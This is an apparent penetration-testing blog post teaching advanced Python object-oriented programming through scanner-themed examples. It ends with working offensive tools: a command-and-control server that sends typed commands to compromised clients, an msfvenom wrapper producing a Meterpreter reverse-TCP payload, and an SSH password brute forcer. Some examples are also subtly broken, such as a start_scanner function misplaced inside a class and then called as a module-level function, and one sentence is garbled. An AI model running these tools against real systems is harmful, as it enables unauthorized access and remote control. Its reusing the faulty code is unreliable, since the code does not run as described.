Greetings, fellow hackers! Welcome to another installment of “Programming Thursdays” on our blog dedicated to red teaming and penetration testing. In this article, we’ll delve into the world of Python and explore advanced concepts and techniques in object-oriented programming (OOP). Get ready to sharpen your coding skills and expand your Python knowledge!

As professionals in the world of cybersecurity, we understand the importance of staying up-to-date with the latest tools and techniques. Python, being one of the most popular programming languages for both offensive and defensive security applications, is an essential skill to master. Today, we’ll cover advanced OOP concepts in Python that are crucial for enhancing your penetration testing arsenal.

This article assumes a working knowledge of Python’s syntax and basic OOP concepts, such as classes and inheritance. If you need a refresher, be sure to check out our previous articles on these topics. Without further ado, let’s dive right into the fascinating world of Python OOP!

Decorators

Decorators are a powerful feature in Python that allows you to modify or extend the functionality of a function or method without changing its code. They can be used to implement cross-cutting concerns like logging, caching, and security.

Function Decorators

Function decorators are simply functions that take another function as an argument and return a new function that extends the functionality of the original function. Let’s start with a simple example. Suppose you want to log the execution time of a function. You can create a decorator to do that:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

import time

def timing_decorator(func):
    def wrapper(*args, **kwargs):
        start_time = time.time()
        result = func(*args, **kwargs)
        end_time = time.time()
        print(f"{func.__name__} took {end_time - start_time:.5f} seconds to execute.")
        return result

    return wrapper

@timing_decorator
def slow_function():
    time.sleep(1)
    return "I am a slow function."

print(slow_function())

Here, timing_decorator is a function decorator that wraps the original function slow_function with additional timing logic.

Method Decorators

Method decorators work in the same way as function decorators but are used to extend the functionality of class methods. Let’s create a simple PortScanner class with a method decorator that logs the execution time of a scanning method:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

import random
import time

class PortScanner:
    @timing_decorator
    def scan_ports(self, host, port_range):
        open_ports = []
        for port in port_range:
            time.sleep(0.1)  # Simulate scanning delay
            if random.choice([True, False]):
                open_ports.append(port)
        return open_ports

scanner = PortScanner()
open_ports = scanner.scan_ports("192.168.1.1", range(80, 90))
print(f"Open ports: {open_ports}")

The timing_decorator we created earlier can be applied to the scan_ports method of our PortScanner class, allowing us to track the execution time of the method without modifying its code.

Class Decorators

Class decorators can be used to modify or extend the functionality of a class. They work by taking a class as an argument and returning a new class that extends the functionality of the original class. Let’s create a class decorator that makes all methods of a class execute in a synchronized manner, ensuring that only one thread can execute any method at a time:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

import threading

def synchronized_class(cls):
    class SynchronizedClass(cls):
        def __getattribute__(self, name):
            attr = super().__getattribute__(name)
            if callable(attr):
                return synchronized_method(attr)
            return attr

    return SynchronizedClass

def synchronized_method(method):
    method_lock = threading.Lock()

    def wrapper(*args, **kwargs):
        with method_lock:
            return method(*args, **kwargs)

    return wrapper

@synchronized_class
class SynchronizedPortScanner(PortScanner):
    pass

sync_scanner = SynchronizedPortScanner()
open_ports = sync_scanner.scan_ports("192.168.1.1", range(80, 90))
print(f"Open ports: {open_ports}")

In this example, the synchronized_class decorator wraps the PortScanner class to create a new SynchronizedPortScanner class with all methods synchronized.

Inheritance and Polymorphism

Inheritance is an essential feature of OOP that enables a class to inherit attributes and behaviors from a parent class, allowing for code reuse and modular design. Polymorphism allows a function or method to work with different types of objects, promoting flexibility and extensibility in your code.

Inheritance

Let’s create a simple inheritance example for a basic network scanner, which will serve as the base class for more specialized scanner classes:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

class NetworkScanner:
    def __init__(self, target):
        self.target = target

    def scan(self):
        print(f"Scanning target: {self.target}")

class PortScanner(NetworkScanner):
    def __init__(self, target, port_range):
        super().__init__(target)
        self.port_range = port_range

    def scan(self):
        super().scan()
        print(f"Scanning ports: {self.port_range}")

port_scanner = PortScanner("192.168.1.1", range(80, 90))
port_scanner.scan()

In this example, the PortScanner class inherits from the NetworkScanner class, reusing its constructor and scan method. The PortScanner class extends the functionality of the NetworkScanner class by adding a port_range attribute and providing a more specific implementation of the scan method.

Polymorphism

Polymorphism enables you to use a single interface to represent different types of objects. In Python, polymorphism is achieved through duck typing, which allows an object to be considered an instance of a class based on its behavior rather than its inheritance. Let’s create a simple example with a VulnerabilityScanner class:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

class VulnerabilityScanner(NetworkScanner):
    def __init__(self, target, vulnerabilities):
        super().__init__(target)
        self.vulnerabilities = vulnerabilities

    def scan(self):
        super().scan()
        print(f"Scanning for vulnerabilities: {self.vulnerabilities}")

    def start_scanner(scanner):
        scanner.scan()

port_scanner = PortScanner("192.168.1.1", range(80, 90))
vuln_scanner = VulnerabilityScanner("192.168.1.1", ["CVE-2023-1234", "CVE-2023-5678"])

start_scanner(port_scanner)
start_scanner(vuln_scanner)

In this example, we have a start_scanner function that accepts an object with a scan method. Because both PortScanner and VulnerabilityScanner have a scan method, we can use the start_scanner function with instances of both classes, demonstrating polymorphism.

Abstract Base Classes

Abstract Base Classes (ABCs) define a common interface for derived classes, ensuring that they implement specific methods. An ABC cannot be instantiated directly but can be subclassed by other classes. In Python, ABCs are created using the abc module.

Let’s create an ABC for our scanner classes:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

import abc

class Scanner(abc.ABC):
    def __init__(self, target):
        self.target = target

    @abc.abstractmethod
    def scan(self):
        pass

class NetworkScanner(Scanner):
    def scan(self):
        print(f"Scanning target: {self.target}")

Here, we define a Scanner class with a scan method marked as an abstract method using the @abc.abstractmethod decorator. Any class that inherits from the Scanner class must provide an implementation of the scan method, or it will also be considered abstract and cannot be instantiated. In this case, the NetworkScanner class provides an implementation of the scan method, allowing it to be instantiated.

1
2
3
4
5
6

# Trying to instantiate the abstract class 'Scanner' will raise a TypeError
# scanner = Scanner("192.168.1.1")  # TypeError: Can't instantiate abstract class Scanner with abstract methods scan

# Instantiating a derived class works as expected
network_scanner = NetworkScanner("192.168.1.1")
network_scanner.scan()

Using ABCs helps enforce a consistent interface for derived classes, making your code more robust and maintainable.

Composition and Aggregation

Composition and aggregation are OOP design principles that promote code reusability and modularity. Both involve using instances of other classes as attributes within a class, with composition implying a stronger relationship between the containing class and its components.

Composition

In composition, the lifetimes of the component objects are bound to the containing object. When the containing object is destroyed, so are its components. Let’s create a simple example with a PenetrationTester class that uses composition to hold instances of various scanner classes:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

class PenetrationTester:
    def __init__(self, target):
        self.target = target
        self.network_scanner = NetworkScanner(target)
        self.port_scanner = PortScanner(target, range(80, 90))
        self.vulnerability_scanner = VulnerabilityScanner(target, ["CVE-2023-1234", "CVE-2023-5678"])

    def perform_scan(self):
        print(f"Performing scan on target: {self.target}")
        self.network_scanner.scan()
        self.port_scanner.scan()
        self.vulnerability_scanner.scan()

pen_tester = PenetrationTester("192.168.1.1")
pen_tester.perform_scan()

In this example, the PenetrationTester class is composed of instances of NetworkScanner, PortScanner, and VulnerabilityScanner. The instances are created and destroyed with the PenetrationTester object.

Aggregation

In aggregation, the containing object does not manage the lifetimes of the component objects. The components can exist independently of the containing object. Let’s modify the previous example to use aggregation:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

class PenetrationTester:
    def __init__(self, target, network_scanner, port_scanner, vulnerability_scanner):
        self.target = target
        self.network_scanner = network_scanner
        self.port_scanner = port_scanner
        self.vulnerability_scanner = vulnerability_scanner

    def perform_scan(self):
        print(f"Performing scan on target: {self.target}")
        self.network_scanner.scan()
        self.port_scanner.scan()
        self.vulnerability_scanner.scan()

network_scanner = NetworkScanner("192.168.1.1")
port_scanner = PortScanner("192.168.1.1", range(80, 90))
vulnerability_scanner = VulnerabilityScanner("192.168.1.1", ["CVE-2023-1234", "CVE-2023-5678"])

pen_tester = PenetrationTester("192.168.1.1", network_scanner, port_scanner, vulnerability_scanner)
pen_tester.perform_scan()

In this modified example, the PenetrationTester class aggregates instances of NetworkScanner, PortScanner, and VulnerabilityScanner that are passed to it during initialization. The instances can exist independently of the PenetrationTester object.

Using composition and aggregation in your code promotes reusability, modularity, and maintainability, leading to more robust and flexible software.

Advanced uses of Properties

Properties in Python allow you to define getter, setter, and deleter methods for an attribute in a class, controlling access to and modification of the attribute. Properties can be used for validation, computed attributes, and enforcing invariants in your code.

Validation with Property Setters

Property setters can be used to validate input values before setting an attribute. Let’s create a Host class that validates IP addresses and hostnames:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

import ipaddress
import re

class Host:
    def __init__(self, ip_address, hostname):
        self.ip_address = ip_address
        self.hostname = hostname

    @property
    def ip_address(self):
        return self._ip_address

    @ip_address.setter
    def ip_address(self, value):
        try:
            ipaddress.ip_address(value)
        except ValueError:
            raise ValueError("Invalid IP address")
        self._ip_address = value

    @property
    def hostname(self):
        return self._hostname

    @hostname.setter
    def hostname(self, value):
        if not re.match(r"^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$", value):
            raise ValueError("Invalid hostname")
        self._hostname = value

host = Host("192.168.1.1", "example.com") # Invalid values will raise a ValueError
host.ip_address = "256.0.0.1" # ValueError: Invalid IP address
host.hostname = "!example" # ValueError: Invalid hostname

In this example, the Host class uses property setters to validate the input values for the ip_address and hostname attributes.

Computed Properties

Computed properties are attributes whose values are derived from other attributes or calculated on the fly. Let’s create a ScanResult class with computed properties for the percentage of open ports and a summary:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

class ScanResult:
    def __init__(self, total_ports, open_ports):
        self.total_ports = total_ports
        self.open_ports = open_ports

    @property
    def open_ports_percentage(self):
        return (len(self.open_ports) / self.total_ports) * 100

    @property
    def summary(self):
        return f"{len(self.open_ports)} out of {self.total_ports} ports open ({self.open_ports_percentage:.2f}%)."

scan_result = ScanResult(1000, [80, 443, 8080])
print(scan_result.summary)

In this example, the ScanResult class has computed properties open_ports_percentage and summary, which derive their values from the total_ports and open_ports attributes.

Enforcing Invariants with Properties

Invariants are conditions that must always hold true for the object’s state. Properties can be used to enforce invariants in your code. Let’s create a simple Rectangle class with an invariant that the width and height must always be positive:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

class Rectangle:
    def __init__(self, width, height):
        self.width = width
        self.height = height

    @property
    def width(self):
        return self._width

    @width.setter
    def width(self, value):
        if value <= 0:
            raise ValueError("Width must be positive")
        self._width = value

    @property
    def height(self):
        return self._height

    @height.setter
    def height(self, value):
        if value <= 0:
            raise ValueError("Height must be positive")
        self._height = value

rect = Rectangle(10, 5)

# Invalid values will raise a ValueError
# rect.width = -1  # ValueError: Width must be positive
# rect.height = 0  # ValueError: Height must be positive

In this example, the Rectangle class uses properties to enforce the invariant that the `width andattributes must always be positive.

Using properties in your code can help you control access to and modification of attributes, validate input values, compute derived values, and enforce invariants, leading to more robust and maintainable software.

Practical Code Examples for Pen Testers and Red Teamers

Now that we’ve covered some advanced concepts and techniques in Python’s OOP, let’s dive into a few practical examples tailored specifically for pen testers and red teamers.

Command and Control Server

A Command and Control (C2) server is a crucial part of many red team operations, as it enables communication with compromised systems. Let’s create a simple C2 server class using Python’s socket library:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

import socket
import threading

class CommandAndControlServer:
    def __init__(self, host, port):
        self.host = host
        self.port = port
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connections = []

    def start(self):
        self.server.bind((self.host, self.port))
        self.server.listen(5)
        print(f"[*] Listening on {self.host}:{self.port}")

        while True:
            client, address = self.server.accept()
            print(f"[*] Accepted connection from {address[0]}:{address[1]}")
            client_handler = threading.Thread(target=self.handle_client, args=(client,))
            client_handler.start()

    def handle_client(self, client):
        self.connections.append(client)
        try:
            while True:
                command = input("Enter command: ")
                if command.lower() == "exit":
                    break

                client.sendall(command.encode())
                response = client.recv(1024)
                print(f"Received: {response.decode()}")
        finally:
            self.connections.remove(client)
            client.close()

c2_server = CommandAndControlServer("0.0.0.0", 4444)
c2_server.start()

In this example, the CommandAndControlServer class sets up a simple TCP server to listen for incoming connections. The handle_client method is responsible for sending commands to the connected clients and receiving their responses.

Custom Payload Generator

A payload generator can be a useful tool for creating custom payloads for various exploitation scenarios. Let’s create a simple payload generator class that supports multiple payload types and target architectures:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

import os
import subprocess

class PayloadGenerator:
    def __init__(self, payload_type, target_arch, output_file):
        self.payload_type = payload_type
        self.target_arch = target_arch
        self.output_file = output_file

    def generate(self):
        msfvenom_command = [
            "msfvenom",
            "-p", self.payload_type,
            "-a", self.target_arch,
            "-f", "raw",
            "-o", self.output_file,
        ]

        print(f"[*] Generating payload: {self.payload_type} for {self.target_arch}")
        try:
            subprocess.run(msfvenom_command, check=True)
            print(f"[*] Payload saved to {self.output_file}")
        except subprocess.CalledProcessError:
            print("[-] Error generating payload")

payload_gen = PayloadGenerator("windows/meterpreter/reverse_tcp", "x86", "meterpreter_reverse_tcp_x86.bin")
payload_gen.generate()

In this example, the PayloadGenerator class uses the msfvenom utility from the Metasploit Framework to generate a custom payload based on the specified payload_type, target_arch, and output_file. Note that you’ll need to have Metasploit installed on your system to run this example.

SSH Brute Forcer

An SSH brute forcer can help discover weak credentials on SSH servers. Let’s create a simple SSH brute forcer class using the paramiko library:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

import paramiko

class SSHBruteForcer:
    def __init__(self, target, username_list, password_list):
        self.target = target
        self.username_list = username_list
        self.password_list = password_list

    def start(self):
        for username in self.username_list:
            for password in self.password_list:
                if self.try_credentials(username, password):
                    print(f"[*] Success: {username}:{password}")
                    return True
                else:
                    print(f"[-] Failed: {username}:{password}")
        return False

    def try_credentials(self, username, password):
        ssh_client = paramiko.SSHClient()
        ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            ssh_client.connect(self.target, username=username, password=password, timeout=5)
            ssh_client.close()
            return True
        except (paramiko.AuthenticationException, paramiko.SSHException, paramiko.socket.timeout):
            return False

username_list = ["root", "admin"]
password_list = ["password", "123456", "letmein"]

ssh_brute_forcer = SSHBruteForcer("192.168.1.1", username_list, password_list)
if ssh_brute_forcer.start():
    print("SSH brute force attack succeeded")
else:
    print("SSH brute force attack failed")

In this example, the SSHBruteForcer class uses the paramiko library to try different combinations of usernames and passwords on the target SSH server. The try_credentials method attempts to connect with a given set of credentials and returns True if successful or False otherwise.

Conclusion

We’ve explored some advanced concepts and techniques in Python’s object-oriented programming, including decorators, inheritance, abstract base classes, composition, aggregation, and properties. We also covered practical examples tailored for pen testers and red teamers, such as a command and control server, a custom payload generator, and an SSH brute forcer.

By understanding and applying these advanced OOP concepts in your Python projects, you can write more modular, maintainable, and flexible code, making your red teaming and pen testing efforts more effective and efficient. So go ahead, start experimenting, and let your inner hacker thrive! Happy hacking!